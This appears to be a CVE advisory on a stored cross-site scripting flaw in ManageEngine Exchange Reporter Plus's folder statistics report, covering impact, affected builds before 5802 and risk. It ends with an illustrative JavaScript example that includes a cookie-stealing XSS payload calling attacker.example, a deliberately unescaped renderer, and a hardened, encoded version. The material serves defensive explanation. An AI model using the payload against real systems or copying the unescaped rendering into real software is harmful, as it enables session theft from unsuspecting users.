Impact
A stored cross-site scripting (XSS) vulnerability exists in the Folder Message Count and Size report of Zohocorp ManageEngine Exchange Reporter Plus. User-supplied content that feeds the report is rendered into the report output without adequate sanitization or output encoding, so script injected into that data is persisted and later executes in the browser of any user who views the affected report. A successful attack runs arbitrary JavaScript in the context of the Exchange Reporter Plus web interface, which can be used to deface the interface, perform actions as the viewing user, or steal session tokens and other data reachable from the page. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation).
Affected Systems
Installations of ManageEngine Exchange Reporter Plus running builds prior to 5802 are affected; build 5802 and later are not. The flaw lies in the report generation component that aggregates per-folder statistics, and any vulnerable build whose web interface (and therefore this report) is reachable by the intended victims is exposed.
Risk and Exploitability
The CVSS base score of 7.3 places the issue in the High severity band. No EPSS score is disclosed, and the vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires getting a payload into the data that the Folder Message Count and Size report aggregates; the exact injection vector is not documented here, but since the report summarizes per-folder statistics, attacker-controlled folder names or similar user-editable values that feed the report are the likely carrier. Once stored, the payload fires for every user who subsequently opens the report, including administrators, with no further action by the attacker, so a single injection can reach many internal users. Until a fixed build is deployed, limiting who can view the report and checking the stored report data for markup are the practical mitigations.
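The following is an added example, not code from ManageEngine or from this advisory, that shows the pattern behind a stored XSS in a tabular report and the output encoding that closes it. The folder statistics, the attacker-controlled folder name, the hostname attacker.example and all function names are constructed for illustration; nothing here is taken from the product.

```javascript
// Added example (not ManageEngine code): stored XSS in a folder-statistics
// report, rendered two ways, plus a crude check a tester can run over the
// generated HTML.

// Constructed sample of the rows such a report would aggregate. The folder
// name is user-controlled (mailbox owners name their own folders), so it is the
// natural carrier for a stored payload. The payload and host are hypothetical.
const folderStats = [
  { folder: "Inbox", count: 1204, sizeKb: 98231 },
  { folder: "Projects/2024", count: 87, sizeKb: 4410 },
  {
    folder: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    count: 1,
    sizeKb: 2,
  },
];

// Vulnerable renderer: the folder name is concatenated straight into HTML, so
// any markup stored in the data becomes live markup for every viewer.
function renderReportVulnerable(rows) {
  return rows
    .map(r => `<tr><td>${r.folder}</td><td>${r.count}</td><td>${r.sizeKb}</td></tr>`)
    .join("\n");
}

// HTML entity encoding suitable for text nodes and double-quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened renderer: every user-controlled field is encoded for the HTML
// context it lands in, and numeric fields are coerced so they cannot carry text.
function renderReportSafe(rows) {
  return rows
    .map(r =>
      `<tr><td>${escapeHtml(r.folder)}</td><td>${Number(r.count)}</td><td>${Number(r.sizeKb)}</td></tr>`)
    .join("\n");
}

// Crude tester's check: does any table cell that should hold plain text still
// contain raw markup characters? Returns true when the report is vulnerable.
function cellsContainRawMarkup(html) {
  const cells = [...html.matchAll(/<td>([\s\S]*?)<\/td>/g)].map(m => m[1]);
  return cells.some(c => /[<>"]/.test(c));
}

// Stand-alone run: the vulnerable output carries the live <img> tag, the safe
// output carries only entities.
console.log("vulnerable:", cellsContainRawMarkup(renderReportVulnerable(folderStats)));
console.log("hardened:  ", cellsContainRawMarkup(renderReportSafe(folderStats)));
```

The same check can be pointed at a saved copy of a real report page to confirm a fix: after upgrading, no cell of the Folder Message Count and Size table should contain an unencoded angle bracket or quote, whatever names exist in the mailboxes it summarizes.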
OpenCVE Enrichment